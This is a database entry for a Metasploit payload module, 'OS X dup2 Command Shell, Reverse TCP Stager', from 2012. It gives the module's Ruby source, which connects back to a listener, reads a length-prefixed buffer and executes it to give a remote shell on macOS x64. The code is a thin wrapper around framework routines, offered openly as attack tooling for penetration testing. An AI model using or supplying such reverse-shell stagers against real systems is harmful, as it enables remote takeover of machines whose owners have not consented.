Type: metasploit
Reporter: Nemo, nemo <[email protected]>
ID: MSF:PAYLOAD-OSX-X64-DUPANDEXECVE-REVERSE_TCP-
History: Sep 22, 2012 - 1:31 p.m.

OS X dup2 Command Shell, Reverse TCP Stager

2012-09-22 13:31:42
www.rapid7.com

dup2 socket in edi, then execve. Connect, read length, read buffer, execute

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = 168

  include Msf::Payload::Osx::ReverseTcp_x64
  include Msf::Payload::TransportConfig
  include Msf::Payload::Stager

  def initialize(info = { })
    super(merge_info(info,
      'Name'        => 'Reverse TCP Stager',
      'Description' => 'Connect, read length, read buffer, execute',
      'Author'      => 'nemo <nemo[at]felinemenace.org>',
      'License'     => MSF_LICENSE,
      'Platform'    => 'osx',
      'Arch'        => ARCH_X64,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Stager'      => { 'RequiresMidstager' => false }, # Originally set to true, but only Linux payloads use this at the moment, not OSX.
      'Convention'  => 'sockedi',
    ))
  end

  def generate(opts = {})
    generate_reverse_tcp(opts)
  end

end